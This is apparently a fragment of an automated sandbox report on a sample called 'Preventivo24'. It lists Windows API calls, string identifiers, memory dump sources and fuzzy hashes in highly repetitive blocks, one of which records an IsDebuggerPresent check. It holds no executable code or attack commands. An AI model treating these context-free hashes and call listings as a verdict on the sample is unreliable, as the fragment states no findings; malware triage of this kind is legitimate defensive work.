                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Find$AllocateCloseFileFirstHeap
                                                                              • String ID: %d.%d.%d.%d
                                                                              • API String ID: 1673784098-3491811756
                                                                              • Opcode ID: 95e604a9db67d8f0af94cf7af5d81ca3c21b01d5cd4cf8c66809030d91d34100
                                                                              • Instruction ID: 34e8a60c20c19a23e322440c2b5c86852999d9ca26e94bf4a32a13abb8727b52
                                                                              • Opcode Fuzzy Hash: 95e604a9db67d8f0af94cf7af5d81ca3c21b01d5cd4cf8c66809030d91d34100
                                                                              • Instruction Fuzzy Hash: 75718D35905219DFDF24EF28C849BADBBB4AF44314F1082D9E919AB391DB359E84CF80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: <> "$ = "$Hide$Show
                                                                              • API String ID: 0-289022205
                                                                              • Opcode ID: 12df92abec72051d629e48a07d7ff6433655fe94275da2db3cffaa9df5501d1c
                                                                              • Instruction ID: cbf0158481508a01c1b275d0b3990784f12c1adf87b65f4fc81d79c50d3beaf7
                                                                              • Opcode Fuzzy Hash: 12df92abec72051d629e48a07d7ff6433655fe94275da2db3cffaa9df5501d1c
                                                                              • Instruction Fuzzy Hash: 40023570D00259CFDB24DF64C955BEEB7B1AF55304F1096DAE40ABB291EB706A84CFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,01142730,00000000), ref: 00FEB501
                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,?,-00000001,00000078,-00000001), ref: 00FEB53D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale$HeapProcess
                                                                              • String ID: %d-%s
                                                                              • API String ID: 3246605784-1781338863
                                                                              • Opcode ID: d8e3566304045b4b6ada76d1708058cdf05bb4673d39b38a24cf39d2bfb56981
                                                                              • Instruction ID: c83db5a2b7ffb3d14072ee402cc653ec09ee8d470c350aa394f56ea8a281cfae
                                                                              • Opcode Fuzzy Hash: d8e3566304045b4b6ada76d1708058cdf05bb4673d39b38a24cf39d2bfb56981
                                                                              • Instruction Fuzzy Hash: E331BA72A04209ABDB14DF99CC4ABAEFBB5FF48724F14416DF529A7381DB756900CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: MultipleInstances$MultipleInstancesProps$OldProductCode$ProductCode
                                                                              • API String ID: 0-469785651
                                                                              • Opcode ID: a43a63fa3bec5ccdafb8409375f8c1aab25f8d5fb985bc4ad15e079e9b17b6eb
                                                                              • Instruction ID: 401f1451e8ee98b3e59408eea5fbd08648cfe6cc7a1eb51b2b165bfee3d543c8
                                                                              • Opcode Fuzzy Hash: a43a63fa3bec5ccdafb8409375f8c1aab25f8d5fb985bc4ad15e079e9b17b6eb
                                                                              • Instruction Fuzzy Hash: AEC1C036A00211CBCB18DFA8C8906BAB7B2FF5E318B145569D8167F245EB31FD46CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualQuery.KERNEL32(80000000,01087778,0000001C,0108796D,00000000,?,?,?,?,?,?,?,01087778,00000004,011CE438,010879FD), ref: 01087844
                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,01087778,00000004,011CE438,010879FD), ref: 0108785F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: InfoQuerySystemVirtual
                                                                              • String ID: D
                                                                              • API String ID: 401686933-2746444292
                                                                              • Opcode ID: 524c94240f5c45047fe8be0d2a047da58f038addaf03f70679d8bf38b793df0c
                                                                              • Instruction ID: 2b0ff9699314b0a91dffa2bd4707295b14007f67db4ecdbce75f944f30684809
                                                                              • Opcode Fuzzy Hash: 524c94240f5c45047fe8be0d2a047da58f038addaf03f70679d8bf38b793df0c
                                                                              • Instruction Fuzzy Hash: BA01FC326501099BDB14DE29DC05BED7FEAAFC4324F1CC174EE99D7244D634D541C680
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetVersionExW.KERNEL32(?), ref: 01083E62
                                                                              • GetVersionExW.KERNEL32(00000114), ref: 01083EB1
                                                                              • IsProcessorFeaturePresent.KERNEL32(00000011), ref: 01083EC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Version$FeaturePresentProcessor
                                                                              • String ID:
                                                                              • API String ID: 1871528217-0
                                                                              • Opcode ID: e72fe3828f36aa5852d8370e85f61aaa7e4503bb9f2303031d41c3280475bf6c
                                                                              • Instruction ID: 324f301395df14039fa1bb25642528f59f5a4c5d311024e1feee73fa5014122b
                                                                              • Opcode Fuzzy Hash: e72fe3828f36aa5852d8370e85f61aaa7e4503bb9f2303031d41c3280475bf6c
                                                                              • Instruction Fuzzy Hash: B9612971B182204BE35CDE2DDC842ABBBD5EBC9741F04463EE5E6C7281D6B8C549CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,B5580983,?,?), ref: 00F9F62F
                                                                              • FindNextFileW.KERNEL32(000000FF,00000010), ref: 00F9F73A
                                                                              • FindClose.KERNEL32(000000FF), ref: 00F9F795
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 3541575487-0
                                                                              • Opcode ID: 656c0d5d66a5f5d6cd7ce1a5a5ff98d4759461a54d3263a59e76007b388e84be
                                                                              • Instruction ID: af98c36b69987bb67fb58adde97969e80cfdc49fd52b67e639bd7b1fe93b2424
                                                                              • Opcode Fuzzy Hash: 656c0d5d66a5f5d6cd7ce1a5a5ff98d4759461a54d3263a59e76007b388e84be
                                                                              • Instruction Fuzzy Hash: 78618971E00219DFDF28EB64C899BEEBBB8EF54310F5441A9D459A3291DB701E88CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • IsWindow.USER32(00000004), ref: 00EA2EAB
                                                                              • GetWindowLongW.USER32(00000004,000000FC), ref: 00EA2EC4
                                                                              • SetWindowLongW.USER32(00000004,000000FC,?), ref: 00EA2ED6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long
                                                                              • String ID:
                                                                              • API String ID: 847901565-0
                                                                              • Opcode ID: 077fec39867864bf6496dd946b544c83bd457f4a092f0fdfb06530fc39ec823d
                                                                              • Instruction ID: 805bb438cd982b6d92b58e1a8630498212019d6aa72b8872b4dfaa2d477db20b
                                                                              • Opcode Fuzzy Hash: 077fec39867864bf6496dd946b544c83bd457f4a092f0fdfb06530fc39ec823d
                                                                              • Instruction Fuzzy Hash: 34418CB0A04616AFDB14DF69C948B5ABBB4FF09314F004268E524AB780DB76F914CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowLongW.USER32(00000003,000000FC), ref: 00EA90C6
                                                                              • SetWindowLongW.USER32(00000003,000000FC,?), ref: 00EA90D8
                                                                              • DeleteCriticalSection.KERNEL32(?,B5580983,?,?,?,?,010B8014,000000FF), ref: 00EA9103
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow$CriticalDeleteSection
                                                                              • String ID:
                                                                              • API String ID: 1978754570-0
                                                                              • Opcode ID: fae417559a55c0e132be682212833649503b704985fc7cfc6ca9ef058f4aaed8
                                                                              • Instruction ID: 994b81c2aad87418a2c20cff8790a92f0a5210a1f7e124c4ded6e5c612f09df6
                                                                              • Opcode Fuzzy Hash: fae417559a55c0e132be682212833649503b704985fc7cfc6ca9ef058f4aaed8
                                                                              • Instruction Fuzzy Hash: 5631C370A05646FFCB24DF28C848B8AFBF8FF16714F144269E464A7691D771E950CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0108F93B
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0108F945
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0108F952
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                              • String ID:
                                                                              • API String ID: 3906539128-0
                                                                              • Opcode ID: 55d196f74205befce7ba87ed92d88d0a299a365bb64362fb457a5eb15020507b
                                                                              • Instruction ID: 1e46a7adedbf9cabe035e8a4517a6c9389f31d9a1d32a9f19b1d782cb1016b13
                                                                              • Opcode Fuzzy Hash: 55d196f74205befce7ba87ed92d88d0a299a365bb64362fb457a5eb15020507b
                                                                              • Instruction Fuzzy Hash: 6031C57490122DABCB61EF68D9887CCBBB8BF18314F5041EAE45CA7290E7749B858F44
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadResource.KERNEL32(00000000,00000000,B5580983,00000001,00000000,?,00000000,010B18B0,000000FF,?,00E8A6EC,?,?,?,?,?), ref: 00E8A76B
                                                                              • LockResource.KERNEL32(00000000,?,00E8A6EC,?,?,?,?,?,00000000,010B1F80,000000FF,?,00E8A890,?,?,?), ref: 00E8A776
                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,00E8A6EC,?,?,?,?,?,00000000,010B1F80,000000FF,?,00E8A890,?,?), ref: 00E8A784
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$LoadLockSizeof
                                                                              • String ID:
                                                                              • API String ID: 2853612939-0
                                                                              • Opcode ID: 5d3640e331a6ca3e10e95a32e70caca2717fffdb007cc8dbfe48bddf6f5e135b
                                                                              • Instruction ID: 667ff27de2f2e2e8457bae4f1f0397289e433e4175e0552e08e3419a804ab5e7
                                                                              • Opcode Fuzzy Hash: 5d3640e331a6ca3e10e95a32e70caca2717fffdb007cc8dbfe48bddf6f5e135b
                                                                              • Instruction Fuzzy Hash: BB119436A046549BD7359F59DC85B66F7F8EB89B15F050A3BEC1EE3240EA36AC008790
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowLongW.USER32(0000001B,000000FC), ref: 00E9ADE9
                                                                              • SetWindowLongW.USER32(0000001B,000000FC,?), ref: 00E9ADF7
                                                                              • DestroyWindow.USER32(0000001B,?,?,?,?,?,?,?,?,?,?,?,?,80004003,?,00000000), ref: 00E9AE23
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$Destroy
                                                                              • String ID:
                                                                              • API String ID: 3055081903-0
                                                                              • Opcode ID: 0d4dcd3761c917d743fd8f11cc7e7416bb2fe608257dac4a7ffac7aeb6c89487
                                                                              • Instruction ID: 0a28da5e0b168f9c8fae51a5447f66d819ce3b530a785979ba997da324c35559
                                                                              • Opcode Fuzzy Hash: 0d4dcd3761c917d743fd8f11cc7e7416bb2fe608257dac4a7ffac7aeb6c89487
                                                                              • Instruction Fuzzy Hash: 4CF0303000AB11ABDB715B28ED05B937BE1BF05725F085B2DE4BA925E4DB70E880DB40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
